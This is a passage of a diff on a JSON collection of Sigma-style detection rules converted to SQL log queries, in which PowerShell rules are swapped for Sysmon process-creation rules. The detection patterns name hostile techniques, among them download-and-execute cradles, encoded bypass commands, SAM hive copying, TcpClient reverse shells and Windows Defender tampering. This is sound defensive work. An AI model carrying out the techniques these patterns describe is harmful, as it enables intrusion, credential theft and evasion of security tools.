ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText 
LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", - "id": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", - "status": "test", - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) 
as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "author": "frack113", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "status": "experimental", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1217" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter Bookmarks%' ESCAPE '\\' AND ScriptBlockText LIKE '% -ErrorAction SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Force%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_get_childitem_bookmarks.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Powershell Store File In Alternate Data Stream", - "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "title": "Code Execution via Pcwutl.dll", + "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "status": "test", - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - 
"author": "frack113", + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Use of Program Compatibility Troubleshooter Helper" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" ], - "filename": "posh_ps_store_file_in_alternate_data_stream.yml" + "filename": "proc_creation_win_lolbin_pcwutl.yml" }, { - "title": "Recon Information for Export with PowerShell", - "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "author": "frack113", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_recon_export.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. 
Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "PowerShell Deleted Mounted Share", - "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "title": "Suspicious SYSVOL Domain Group Policy Access", + "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", "status": "test", - "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070.005" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_mounted_share_deletion.yml" + "filename": "proc_creation_win_susp_sysvol_access.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "DriverQuery.EXE Execution", + "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detect usage of the \"driverquery\" utility. 
Which can be used to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate use by third party tools in order to investigate installed drivers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_driverquery_usage.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", - "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. 
As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. 
Anhaus, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Use Get-NetTCPConnection", - "id": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", "status": "test", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_pc_susp_get_nettcpconnection.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", - "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_pc_xor_commandline.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": 
"Suspicious Scan Loop Network", + "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059", + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_susp_network_scan_loop.yml" }, { - "title": "Suspicious PowerShell Download", - "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", - "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote PowerShell Session Host Process (WinRM)", + "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", + "status": "test", + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.t1021.006" ], 
"falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" ], - "filename": "posh_pc_susp_download.yml" + "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", - "author": "frack113", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR 
((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", - "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "title": "Arbitrary MSI Download Via Devinit.EXE", + "id": "90d50722-0483-4065-8e35-57efaadd354d", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], 
"level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_zip_compress.yml" + "filename": "proc_creation_win_devinit_lolbin_usage.yml" }, { - "title": "Suspicious Non PowerShell WSMAN COM Provider", - "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "title": "Remote Access Tool - ScreenConnect Execution", + "id": "57bff678-25d1-4d6c-8211-8ca106d12053", "status": "test", - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" ], - "filename": "posh_pc_wsman_com_provider_no_powershell.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", - "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "title": "Java Running with Remote Debugging", + "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1203", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = 
'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" ], - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_java_remote_debugging.yml" }, { - "title": "Alternate PowerShell Hosts", - "id": "d7326048-328b-4d5e-98af-86e84b17c765", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Other scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND 